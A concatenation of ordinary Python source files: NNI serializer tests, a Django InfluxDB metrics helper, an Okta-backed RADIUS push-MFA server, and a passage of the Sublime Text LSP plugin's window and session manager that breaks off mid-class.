dataloader = pl.DataLoader(dataset, batch_size=10, num_workers=2)
x, y = next(iter(dataloader))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
def _test_multiprocessing_dataset_worker(dataset):
if sys.platform == 'linux':
# on non-linux, the loaded object will become non-traceable
# due to an implementation limitation
assert is_traceable(dataset)
else:
from torch.utils.data import Dataset
assert isinstance(dataset, Dataset)
def test_multiprocessing_dataset():
from torch.utils.data import Dataset
dataset = nni.trace(Dataset)()
import multiprocessing
process = multiprocessing.Process(target=_test_multiprocessing_dataset_worker, args=(dataset, ))
process.start()
process.join()
assert process.exitcode == 0
def test_type():
assert nni.dump(torch.optim.Adam) == '{"__nni_type__": "path:torch.optim.adam.Adam"}'
assert nni.load('{"__nni_type__": "path:torch.optim.adam.Adam"}') == torch.optim.Adam
assert Foo == nni.load(nni.dump(Foo))
assert nni.dump(math.floor) == '{"__nni_type__": "path:math.floor"}'
assert nni.load('{"__nni_type__": "path:math.floor"}') == math.floor
def test_lightning_earlystop():
import nni.retiarii.evaluator.pytorch.lightning as pl
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
trainer = pl.Trainer(callbacks=[nni.trace(EarlyStopping)(monitor="val_loss")])
pickle_size_limit = 4096 if sys.platform == 'linux' else 32768
trainer = nni.load(nni.dump(trainer, pickle_size_limit=pickle_size_limit))
assert any(isinstance(callback, EarlyStopping) for callback in trainer.callbacks)
def test_pickle_trainer():
import nni.retiarii.evaluator.pytorch.lightning as pl
from pytorch_lightning import Trainer
trainer = pl.Trainer(max_epochs=1)
data = pickle.dumps(trainer)
trainer = pickle.loads(data)
assert isinstance(trainer, Trainer)
def test_generator():
import torch.nn as nn
import torch.optim as optim
class Net(nn.Module):
def __init__(self):
super().__init__()
self.conv = nn.Conv2d(3, 10, 1)
def forward(self, x):
return self.conv(x)
model = Net()
optimizer = nni.trace(optim.Adam)(model.parameters())
print(optimizer.trace_kwargs)
def test_arguments_kind():
def foo(a, b, *c, **d):
pass
d = nni.trace(foo)(1, 2, 3, 4)
assert d.trace_args == [1, 2, 3, 4]
assert d.trace_kwargs == {}
d = nni.trace(foo)(a=1, b=2)
assert d.trace_kwargs == dict(a=1, b=2)
d = nni.trace(foo)(1, b=2)
# this is not perfect, but it's safe
assert d.trace_kwargs == dict(a=1, b=2)
def foo(a, *, b=3, c=5):
pass
d = nni.trace(foo)(1, b=2, c=3)
assert d.trace_kwargs == dict(a=1, b=2, c=3)
import torch.nn as nn
lstm = nni.trace(nn.LSTM)(2, 2)
assert lstm.input_size == 2
assert lstm.hidden_size == 2
assert lstm.trace_args == [2, 2]
lstm = nni.trace(nn.LSTM)(input_size=2, hidden_size=2)
assert lstm.trace_kwargs == {'input_size': 2, 'hidden_size': 2}
def test_subclass():
@nni.trace
class Super:
def __init__(self, a, b):
self._a = a
self._b = b
class Sub1(Super):
def __init__(self, c, d):
super().__init__(3, 4)
self._c = c
self._d = d
@nni.trace
class Sub2(Super):
def __init__(self, c, d):
super().__init__(3, 4)
self._c = c
self._d = d
obj = Sub1(1, 2)
# There could be trace_kwargs for obj. Behavior is undefined.
assert obj._a == 3 and obj._c == 1
assert isinstance(obj, Super)
obj = Sub2(1, 2)
assert obj.trace_kwargs == {'c': 1, 'd': 2}
assert issubclass(type(obj), Super)
assert isinstance(obj, Super)
def test_get():
@nni.trace
class Foo:
def __init__(self, a = 1):
self._a = a
def bar(self):
return self._a + 1
obj = Foo(3)
assert nni.load(nni.dump(obj)).bar() == 4
obj1 = obj.trace_copy()
with pytest.raises(AttributeError):
obj1.bar()
obj1.trace_kwargs['a'] = 5
obj1 = obj1.get()
assert obj1.bar() == 6
obj2 = obj1.trace_copy()
obj2.trace_kwargs['a'] = -1
assert obj2.get().bar() == 0
def test_model_wrapper_serialize():
from nni.retiarii import model_wrapper
@model_wrapper
class Model(nn.Module):
def __init__(self, in_channels):
super().__init__()
self.in_channels = in_channels
model = Model(3)
dumped = nni.dump(model)
loaded = nni.load(dumped)
assert loaded.in_channels == 3
def test_model_wrapper_across_process():
main_file = os.path.join(os.path.dirname(__file__), 'imported', '_test_serializer_main.py')
subprocess.run([sys.executable, main_file, '0'], check=True)
subprocess.run([sys.executable, main_file, '1'], check=True)
|
utils.py
|
"""Utilities for working with influxdb."""
import logging
import os
import socket
from threading import Thread
from django.conf import settings
from influxdb import InfluxDBClient
logger = logging.getLogger(__name__)
def build_tags(tags=None):
final_tags = {}
final_tags.update({
'host': getattr(settings, 'INFLUXDB_TAGS_HOST', ''),
'environment': getattr(settings, 'ENVIRONMENT',
os.environ.get('ENV', 'dev')),
'project': getattr(settings, 'PROJECT_MODULE',
os.environ.get('PROJECT', '')),
'service': os.environ.get('SERVICE', ''),
'container': socket.gethostname(),
})
final_tags.update(getattr(settings, 'INFLUXDB_EXTRA_TAGS', {}))
final_tags.update(tags or {})
return {k: v for k, v in final_tags.items() if v}
def get_client():
"""Returns an ``InfluxDBClient`` instance."""
return InfluxDBClient(
settings.INFLUXDB_HOST,
settings.INFLUXDB_PORT,
settings.INFLUXDB_USER,
settings.INFLUXDB_PASSWORD,
settings.INFLUXDB_DATABASE,
timeout=settings.INFLUXDB_TIMEOUT,
ssl=getattr(settings, 'INFLUXDB_SSL', False),
verify_ssl=getattr(settings, 'INFLUXDB_VERIFY_SSL', False),
)
def query(query):
"""Wrapper around ``InfluxDBClient.query()``."""
client = get_client()
return client.query(query)
def write_points(data, force_disable_threading=False):
"""
Writes a series to influxdb.
:param data: Array of dicts, as required by
https://github.com/influxdb/influxdb-python
:param force_disable_threading: When being called from the Celery task, we
set this to `True` so that the user doesn't accidentally use Celery and
threading at the same time.
"""
if getattr(settings, 'INFLUXDB_DISABLED', False):
return
client = get_client()
use_threading = getattr(settings, 'INFLUXDB_USE_THREADING', False)
if force_disable_threading:
use_threading = False
if use_threading is True:
thread = Thread(target=process_points, args=(client, data, ))
thread.start()
else:
process_points(client, data)
def process_points(client, data): # pragma: no cover
"""Method to be called via threading module."""
try:
client.write_points(data)
except Exception:
if getattr(settings, 'INFLUXDB_FAIL_SILENTLY', True):
logger.exception('Error while writing data points')
else:
raise
|
server.py
|
#!/usr/bin/python
from __future__ import print_function
from pyrad.dictionary import Dictionary
from pyrad.server import Server, RemoteHost
from pyrad.packet import AccessReject, AccessAccept
import logging
from okta import OktaAPI, ResponseCodes
import os
import sys
import threading
logging.basicConfig(level="INFO",
format="%(asctime)s [%(levelname)-8s] %(message)s")
logger = logging.getLogger(__name__)
class RadiusServer(Server):
def __init__(self, *args, **kwargs):
self.okta = OktaAPI(url=args[0], key=args[1])
super().__init__(**kwargs)
def auth_handler(self, pkt):
user_name = pkt["User-Name"][0][
pkt["User-Name"][0].find("\\") + 1 if pkt["User-Name"][0].find("\\") > 0 else 0:]
logger.info("Received an authentication request for {}.".format(user_name))
logger.debug("Attributes: ")
for attr in pkt.keys():
logger.debug("%s: %s" % (attr, pkt[attr]))
reply = self.CreateReplyPacket(pkt, **{
"Proxy-State": pkt["Proxy-State"]
})
reply.code = AccessReject
try:
if os.environ.get('OKTA_USE_SAMACCOUNTNAME'):
u = self.okta.get_user_by_samaccountname(user_name)
else:
u = self.okta.get_user_id(user_name)
f = self.okta.get_user_push_factor(u)
if f is not None:
push = self.okta.push_verify(u, f["id"])
if push == ResponseCodes.SUCCESS:
logger.info("Push approved by {}.".format(user_name))
reply.code = AccessAccept
else:
logger.warning("Push was rejected or timed out for {}!".format(user_name))
else:
logger.warning("{} does not have an Okta push factor enrolled!".format(user_name))
except Exception as e:
logger.exception("There was a problem with the Okta MFA", e)
self.SendReplyPacket(pkt.fd, reply)
def HandleAuthPacket(self, pkt):
thread = threading.Thread(target=self.auth_handler, args=(pkt, ))
thread.start()
def run():
# Check to make sure env variables are set
if not all(v in os.environ for v in ["OKTA_API_KEY", "OKTA_TENANT", "RADIUS_SECRET"]):
logger.error("Missing environment variables!")
sys.exit("Missing environment variables!")
authport = int(os.getenv("RADIUS_AUTH_PORT", 1812))
acctport = int(os.getenv("RADIUS_ACCT_PORT", 1813))
# Create server and read the attribute dictionary
srv = RadiusServer(
os.getenv('OKTA_TENANT'),
os.getenv('OKTA_API_KEY'),
dict=Dictionary("dictionary"),
coa_enabled=False,
authport=authport,
acctport=acctport
)
# Add clients (address, secret, name)
srv.hosts["0.0.0.0"] = RemoteHost("0.0.0.0", os.getenv("RADIUS_SECRET").encode(), "0.0.0.0")
srv.BindToAddress("0.0.0.0")
logger.info(f"Starting server on port {authport}...")
# Run the RADIUS server
srv.Run()
if __name__ == '__main__':
run()
|
windows.py
|
from ...third_party import WebsocketServer # type: ignore
from .configurations import ConfigManager
from .configurations import WindowConfigManager
from .diagnostics import ensure_diagnostics_panel
from .logging import debug
from .logging import exception_log
from .message_request_handler import MessageRequestHandler
from .panels import update_server_panel
from .protocol import CodeLens, Diagnostic
from .protocol import Error
from .sessions import get_plugin
from .sessions import Logger
from .sessions import Manager
from .sessions import Session
from .sessions import SessionBufferProtocol
from .sessions import SessionViewProtocol
from .settings import userprefs
from .transports import create_transport
from .types import ClientConfig
from .typing import Optional, Any, Dict, Deque, List, Generator, Tuple, Iterable, Sequence, Union
from .views import extract_variables
from .views import make_link
from .workspace import disable_in_project
from .workspace import enable_in_project
from .workspace import ProjectFolders
from .workspace import sorted_workspace_folders
from abc import ABCMeta
from abc import abstractmethod
from collections import deque
from subprocess import CalledProcessError
from time import time
from weakref import ref
from weakref import WeakSet
import functools
import json
import os
import sublime
import threading
_NO_DIAGNOSTICS_PLACEHOLDER = " No diagnostics. Well done!"
class AbstractViewListener(metaclass=ABCMeta):
TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY = "lsp_total_errors_and_warnings"
view = None # type: sublime.View
@property
@abstractmethod
def manager(self) -> "WindowManager":
raise NotImplementedError()
@abstractmethod
def session(self, capability_path: str, point: Optional[int] = None) -> Optional[Session]:
raise NotImplementedError()
@abstractmethod
def on_session_initialized_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def on_session_shutdown_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def diagnostics_async(self) -> Iterable[Tuple[SessionBufferProtocol, Sequence[Tuple[Diagnostic, sublime.Region]]]]:
raise NotImplementedError()
@abstractmethod
def diagnostics_intersecting_region_async(
self,
region: sublime.Region
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
@abstractmethod
def diagnostics_touching_point_async(
self,
pt: int
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
def diagnostics_intersecting_async(
self,
region_or_point: Union[sublime.Region, int]
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
if isinstance(region_or_point, int):
return self.diagnostics_touching_point_async(region_or_point)
elif region_or_point.empty():
return self.diagnostics_touching_point_async(region_or_point.a)
else:
return self.diagnostics_intersecting_region_async(region_or_point)
@abstractmethod
def diagnostics_panel_contribution_async(self) -> Sequence[Tuple[str, Optional[int], Optional[str], Optional[str]]]:
raise NotImplementedError()
@abstractmethod
def sum_total_errors_and_warnings_async(self) -> Tuple[int, int]:
raise NotImplementedError()
@abstractmethod
def on_diagnostics_updated_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def on_code_lens_capability_registered_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def get_resolved_code_lenses_for_region(self, region: sublime.Region) -> Iterable[CodeLens]:
raise NotImplementedError()
@abstractmethod
def session_views_async(self) -> Iterable[SessionViewProtocol]:
raise NotImplementedError()
@abstractmethod
def get_language_id(self) -> str:
raise NotImplementedError()
@abstractmethod
def do_signature_help_async(self, manual: bool) -> None:
raise NotImplementedError()
@abstractmethod
def on_post_move_window_async(self) -> None:
raise NotImplementedError()
def extract_message(params: Any) -> str:
return params.get("message", "???") if isinstance(params, dict) else "???"
def set_diagnostics_count(view: sublime.View, errors: int, warnings: int) -> None:
try:
key = AbstractViewListener.TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY
if userprefs().show_diagnostics_count_in_view_status:
view.set_status(key, "E: {}, W: {}".format(errors, warnings))
else:
view.erase_status(key)
except Exception:
pass
class WindowManager(Manager):
DIAGNOSTIC_PHANTOM_KEY = "lsp_diagnostic_phantom"
def __init__(
self,
window: sublime.Window,
workspace: ProjectFolders,
configs: WindowConfigManager,
) -> None:
self._window = window
self._configs = configs
self._sessions = WeakSet() # type: WeakSet[Session]
self._workspace = workspace
self._pending_listeners = deque() # type: Deque[AbstractViewListener]
self._listeners = WeakSet() # type: WeakSet[AbstractViewListener]
self._new_listener = None # type: Optional[AbstractViewListener]
self._new_session = None # type: Optional[Session]
self._diagnostic_phantom_set = None # type: Optional[sublime.PhantomSet]
self._panel_code_phantoms = None # type: Optional[sublime.PhantomSet]
self.total_error_count = 0
self.total_warning_count = 0
sublime.set_timeout(functools.partial(self._update_panel_main_thread, None, _NO_DIAGNOSTICS_PLACEHOLDER, []))
def get_config_manager(self) -> WindowConfigManager:
return self._configs
def on_load_project_async(self) -> None:
self.update_workspace_folders_async()
self._configs.update()
def on_post_save_project_async(self) -> None:
self.on_load_project_async()
def update_workspace_folders_async(self) -> None:
if self._workspace.update():
workspace_folders = self._workspace.get_workspace_folders()
for session in self._sessions:
session.update_folders(workspace_folders)
def enable_config_async(self, config_name: str) -> None:
enable_in_project(self._window, config_name)
# TODO: Why doesn't enable_in_project cause on_load_project_async to be called?
self._configs.update()
def disable_config_async(self, config_name: str) -> None:
disable_in_project(self._window, config_name)
# TODO: Why doesn't disable_in_project cause on_load_project_async to be called?
self._configs.update()
def _register_listener(self, listener: AbstractViewListener) -> None:
sublime.set_timeout_async(lambda: self.register_listener_async(listener))
def register_listener_async(self, listener: AbstractViewListener) -> None:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
# Update workspace folders in case the user have changed those since window was created.
# There is no currently no notification in ST that would notify about folder changes.
self.update_workspace_folders_async()
self._pending_listeners.appendleft(listener)
if self._new_listener is None:
self._dequeue_listener_async()
def unregister_listener_async(self, listener: AbstractViewListener) -> None:
self._listeners.discard(listener)
def listeners(self) -> Generator[AbstractViewListener, None, None]:
yield from self._listeners
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
for listener in self.listeners():
if listener.view == view:
return listener
return None
def _dequeue_listener_async(self) -> None:
listener = None # type: Optional[AbstractViewListener]
if self._new_listener is not None:
listener = self._new_listener
# debug("re-checking listener", listener)
self._new_listener = None
else:
try:
listener = self._pending_listeners.pop()
if not listener.view.is_valid():
# debug("listener", listener, "is no longer valid")
return self._dequeue_listener_async()
# debug("adding new pending listener", listener)
self._listeners.add(listener)
except IndexError:
# We have handled all pending listeners.
self._new_session = None
return
if self._new_session:
self._sessions.add(self._new_session)
self._publish_sessions_to_listener_async(listener)
if self._new_session:
if not any(self._new_session.session_views_async()):
self._sessions.discard(self._new_session)
self._new_session.end_async()
self._new_session = None
config = self._needed_config(listener.view)
if config:
# debug("found new config for listener", listener)
self._new_listener = listener
self.start_async(config, listener.view)
else:
# debug("no new config found for listener", listener)
self._new_listener = None
self._dequeue_listener_async()
def _publish_sessions_to_listener_async(self, listener: AbstractViewListener) -> None:
inside_workspace = self._workspace.contains(listener.view)
for session in self._sessions:
if session.can_handle(listener.view, None, inside_workspace):
# debug("registering session", session.config.name, "to listener", listener)
listener.on_session_initialized_async(session)
def window(self) -> sublime.Window:
return self._window
def sessions(self, view: sublime.View, capability: Optional[str] = None) -> Generator[Session, None, None]:
inside_workspace = self._workspace.contains(view)
sessions = list(self._sessions)
for session in sessions:
if session.can_handle(view, capability, inside_workspace):
yield session
def get_session(self, config_name: str, file_path: str) -> Optional[Session]:
return self._find_session(config_name, file_path)
def _can_start_config(self, config_name: str, file_path: str) -> bool:
return not bool(self._find_session(config_name, file_path))
def _find_session(self, config_name: str, file_path: str) -> Optional[Session]:
inside = self._workspace.contains(file_path)
for session in self._sessions:
if session.config.name == config_name and session.handles_path(file_path, inside):
return session
return None
def _needed_config(self, view: sublime.View) -> Optional[ClientConfig]:
configs = self._configs.match_view(view)
handled = False
file_name = view.file_name() or ''
inside = self._workspace.contains(view)
for config in configs:
handled = False
for session in self._sessions:
if config.name == session.config.name and session.handles_path(file_name, inside):
handled = True
break
if not handled:
return config
return None
def start_async(self, config: ClientConfig, initiating_view: sublime.View) -> None:
config = ClientConfig.from_config(config, {})
file_path = initiating_view.file_name() or ''
if not self._can_start_config(config.name, file_path):
# debug('Already starting on this window:', config.name)
return
try:
workspace_folders = sorted_workspace_folders(self._workspace.folders, file_path)
plugin_class = get_plugin(config.name)
variables = extract_variables(self._window)
cwd = None # type: Optional[str]
if plugin_class is not None:
if plugin_class.needs_update_or_installation():
config.set_view_status(initiating_view, "installing...")
plugin_class.install_or_update()
additional_variables = plugin_class.additional_variables()
if isinstance(additional_variables, dict):
variables.update(additional_variables)
cannot_start_reason = plugin_class.can_start(self._window, initiating_view, workspace_folders, config)
if cannot_start_reason:
config.erase_view_status(initiating_view)
message = "cannot start {}: {}".format(config.name, cannot_start_reason)
return self._window.status_message(message)
cwd = plugin_class.on_pre_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "starting...")
session = Session(self, self._create_logger(config.name), workspace_folders, config, plugin_class)
if not cwd:
cwd = workspace_folders[0].path if workspace_folders else None
transport_config = config.resolve_transport_config(variables)
transport = create_transport(transport_config, cwd, session)
if plugin_class:
plugin_class.on_post_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "initialize")
session.initialize_async(
variables, transport,
lambda session, is_error: self._on_post_session_initialize(initiating_view, session, is_error))
self._new_session = session
except Exception as e:
message = "".join((
"Failed to start {0} - disabling for this window. ",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette.",
"\n\n--- Error: ---\n{1}"
)).format(config.name, str(e))
exception_log("Unable to start subprocess for {}".format(config.name), e)
if isinstance(e, CalledProcessError):
print("Server output:\n{}".format(e.output.decode('utf-8', 'replace')))
self._configs.disable_config(config.name)
config.erase_view_status(initiating_view)
sublime.message_dialog(message)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
def _on_post_session_initialize(
self, initiating_view: sublime.View, session: Session, is_error: bool = False
) -> None:
if is_error:
session.config.erase_view_status(initiating_view)
self._new_listener = None
self._new_session = None
else:
sublime.set_timeout_async(self._dequeue_listener_async)
def _create_logger(self, config_name: str) -> Logger:
logger_map = {
"panel": PanelLogger,
"remote": RemoteLogger,
}
loggers = []
for logger_type in userprefs().log_server:
if logger_type not in logger_map:
debug("Invalid logger type ({}) specified for log_server settings".format(logger_type))
continue
loggers.append(logger_map[logger_type])
if len(loggers) == 0:
return RouterLogger() # logs nothing
elif len(loggers) == 1:
return loggers[0](self, config_name)
else:
router_logger = RouterLogger()
for logger in loggers:
router_logger.append(logger(self, config_name))
return router_logger
def handle_message_request(self, session: Session, params: Any, request_id: Any) -> None:
view = self._window.active_view()
if view:
MessageRequestHandler(view, session, request_id, params, session.config.name).show()
def restart_sessions_async(self) -> None:
self._end_sessions_async()
listeners = list(self._listeners)
self._listeners.clear()
for listener in listeners:
self.register_listener_async(listener)
def _end_sessions_async(self) -> None:
for session in self._sessions:
session.end_async()
self._sessions.clear()
def end_config_sessions_async(self, config_name: str) -> None:
sessions = list(self._sessions)
for session in sessions:
if session.config.name == config_name:
session.end_async()
self._sessions.discard(session)
def get_project_path(self, file_path: str) -> Optional[str]:
candidate = None # type: Optional[str]
for folder in self._workspace.folders:
if file_path.startswith(folder):
if candidate is None or len(folder) > len(candidate):
candidate = folder
return candidate
def on_post_exit_async(self, session: Session, exit_code: int, exception: Optional[Exception]) -> None:
self._sessions.discard(session)
for listener in self._listeners:
listener.on_session_shutdown_async(session)
if exit_code != 0 or exception:
config = session.config
msg = "".join((
"{0} exited with status code {1}. ",
"Do you want to restart it? If you choose Cancel, it will be disabled for this window. ",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette."
)).format(config.name, exit_code)
if exception:
msg += "\n\n--- Error: ---\n{}".format(str(exception))
if sublime.ok_cancel_dialog(msg, "Restart {}".format(config.name)):
for listener in self._listeners:
self.register_listener_async(listener)
else:
self._configs.disable_config(config.name)
def plugin_unloaded(self) -> None:
"""
This is called **from the main thread** when the plugin unloads. In that case we must destroy all sessions
from the main thread. That could lead to some dict/list being mutated while iterated over, so be careful
"""
self._end_sessions_async()
def handle_server_message(self, server_name: str, message: str) -> None:
sublime.set_timeout(lambda: update_server_panel(self._window, server_name, message))
def handle_log_message(self, session: Session, params: Any) -> None:
self.handle_server_message(session.config.name, extract_message(params))
def handle_stderr_log(self, session: Session, message: str) -> None:
self.handle_server_message(session.config.name, message)
def handle_show_message(self, session: Session, params: Any) -> None:
sublime.status_message("{}: {}".format(session.config.name, extract_message(params)))
def update_diagnostics_panel_async(self) -> None:
to_render = [] # type: List[str]
base_dir = None
self.total_error_count = 0
self.total_warning_count = 0
listeners = list(self._listeners)
prephantoms = [] # type: List[Tuple[int, int, str, str]]
row = 0
for listener in listeners:
local_errors, local_warnings = listener.sum_total_errors_and_warnings_async()
self.total_error_count += local_errors
self.total_warning_count += local_warnings
contribution = listener.diagnostics_panel_contribution_async()
if not contribution:
continue
file_path = listener.view.file_name() or ""
base_dir = self.get_project_path(file_path) # What about different base dirs for multiple folders?
file_path = os.path.relpath(file_path, base_dir) if base_dir else file_path
to_render.append("{}:".format(file_path))
row += 1
for content, offset, code, href in contribution:
to_render.append(content)
if offset is not None and code is not None and href is not None:
prephantoms.append((row, offset, code, href))
row += content.count("\n") + 1
to_render.append("") # add spacing between filenames
row += 1
for listener in listeners:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
characters = "\n".join(to_render)
if not characters:
characters = _NO_DIAGNOSTICS_PLACEHOLDER
sublime.set_timeout(functools.partial(self._update_panel_main_thread, base_dir, characters, prephantoms))
def _update_panel_main_thread(self, base_dir: Optional[str], characters: str,
prephantoms: List[Tuple[int, int, str, str]]) -> None:
panel = ensure_diagnostics_panel(self._window)
if not panel or not panel.is_valid():
return
if isinstance(base_dir, str):
panel.settings().set("result_base_dir", base_dir)
else:
panel.settings().erase("result_base_dir")
panel.run_command("lsp_update_panel", {"characters": characters})
if self._panel_code_phantoms is None:
self._panel_code_phantoms = sublime.PhantomSet(panel, "hrefs")
phantoms = [] # type: List[sublime.Phantom]
for row, col, code, href in prephantoms:
point = panel.text_point(row, col)
region = sublime.Region(point, point)
phantoms.append(sublime.Phantom(region, make_link(href, code), sublime.LAYOUT_INLINE))
self._panel_code_phantoms.update(phantoms)
def show_diagnostics_panel_async(self) -> None:
if self._window.active_panel() is None:
self._window.run_command("show_panel", {"panel": "output.diagnostics"})
class WindowRegistry(object):
def __init__(self, configs: ConfigManager) -> None:
self._windows = {} # type: Dict[int, WindowManager]
self._configs = configs
def lookup(self, window: sublime.Window) -> WindowManager:
wm = self._windows.get(window.id())
if wm:
return wm
workspace = ProjectFolders(window)
window_configs = self._configs.for_window(window)
state = WindowManager(window=window, workspace=workspace, configs=window_configs)
self._windows[window.id()] = state
return state
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
w = view.window()
if not w:
return None
return self.lookup(w).listener_for_view(view)
def discard(self, window: sublime.Window) -> None:
self._windows.pop(window.id(), None)
class PanelLogger(Logger):
def __init__(self, manager: WindowManager, server_name: str) -> None:
self._manager = ref(manager)
self._server_name = server_name
def stderr_message(self, message: str) -> None:
"""
Not handled here as stderr messages are handled by WindowManager regardless
if this logger is enabled.
"""
pass
def log(self, message: str, params: Any) -> None:
def run_on_async_worker_thread() -> None:
nonlocal message
params_str = str(params)
if 0 < userprefs().log_max_size <= len(params_str):
params_str = '<params with {} characters>'.format(len(params_str))
message = "{}: {}".format(message, params_str)
manager = self._manager()
if manager is not None:
manager.handle_server_message(":", message)
sublime.set_timeout_async(run_on_async_worker_thread)
def outgoing_response(self, request_id: Any, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_response(">>>", request_id), params)
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
if not userprefs().log_server:
return
self.log(self._format_response("~~>", request_id), error.to_lsp())
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("-->", method, request_id), params)
def outgoing_notification(self, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_notification(" ->", method), params)
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
if not userprefs().log_server:
return
direction = "<~~" if is_error else "<<<"
self.log(self._format_response(direction, request_id), params)
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("<--", method, request_id), params)
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
if not userprefs().log_server:
return
direction = "<? " if unhandled else "<- "
self.log(self._format_notification(direction, method), params)
def _format_response(self, direction: str, request_id: Any) -> str:
return "{} {} {}".format(direction, self._server_name, request_id)
def _format_request(self, direction: str, method: str, request_id: Any) -> str:
return "{} {} {}({})".format(direction, self._server_name, method, request_id)
def _format_notification(self, direction: str, method: str) -> str:
return "{} {} {}".format(direction, self._server_name, method)
class RemoteLogger(Logger):
PORT = 9981
DIRECTION_OUTGOING = 1
DIRECTION_INCOMING = 2
_ws_server = None # type: Optional[WebsocketServer]
_ws_server_thread = None # type: Optional[threading.Thread]
_last_id = 0
def __init__(self, manager: WindowManager, server_name: str) -> None:
RemoteLogger._last_id += 1
self._server_name = '{} ({})'.format(server_name, RemoteLogger._last_id)
if not RemoteLogger._ws_server:
try:
RemoteLogger._ws_server = WebsocketServer(self.PORT)
RemoteLogger._ws_server.set_fn_new_client(self._on_new_client)
RemoteLogger._ws_server.set_fn_client_left(self._on_client_left)
RemoteLogger._ws_server.set_fn_message_received(self._on_message_received)
self._start_server()
except OSError as ex:
if ex.errno == 48: # Address already in use
debug('WebsocketServer not started - address already in use')
RemoteLogger._ws_server = None
else:
raise ex
def _start_server(self) -> None:
def start_async() -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.run_forever()
RemoteLogger._ws_server_thread = threading.Thread(target=start_async)
RemoteLogger._ws_server_thread.start()
def _stop_server(self) -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.shutdown()
RemoteLogger._ws_server = None
if RemoteLogger._ws_server_thread:
RemoteLogger._ws_server_thread.join()
RemoteLogger._ws_server_thread = None
def _on_new_client(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client connecting (after handshake)."""
debug("New client connected and was given id %d" % client['id'])
# server.send_message_to_all("Hey all, a new client has joined us")
def _on_client_left(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client disconnecting."""
debug("Client(%d) disconnected" % client['id'])
def _on_message_received(self, client: Dict, server: WebsocketServer, message: str) -> None:
"""Called when a client sends a message."""
debug("Client(%d) said: %s" % (client['id'], message))
def stderr_message(self, message: str) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': 'stderr',
'params': message,
'isError': True,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_INCOMING,
'isError': is_error,
})
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_response(self, request_id: Any, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'isError': True,
'params': error.to_lsp(),
'time': round(time() * 1000),
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_notification(self, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'error': 'Unhandled notification!' if unhandled else None,
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def _broadcast_json(self, data: Dict[str, Any]) -> None:
if RemoteLogger._ws_server:
json_data = json.dumps(data, sort_keys=True, check_circular=False, separators=(',', ':'))
RemoteLogger._ws_server.send_message_to_all(json_data)
class RouterLogger(Logger):
def __init__(self) -> None:
self._loggers = [] # type: List[Logger]
def append(self, logger: Logger) -> None:
self._loggers.append(logger)
def stderr_message(self, *args: Any, **kwargs: Any) -> None:
self._foreach("stderr_message", *args, **kwargs)
def outgoing_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_response", *args, **kwargs)
def outgoing_error_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_error_response", *args, **kwargs)
def outgoing_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_request", *args, **kwargs)
def outgoing_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_notification", *args, **kwargs)
def incoming_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_response", *args, **kwargs)
def incoming_request(self, *args: Any, **kwargs: Any) -> None:
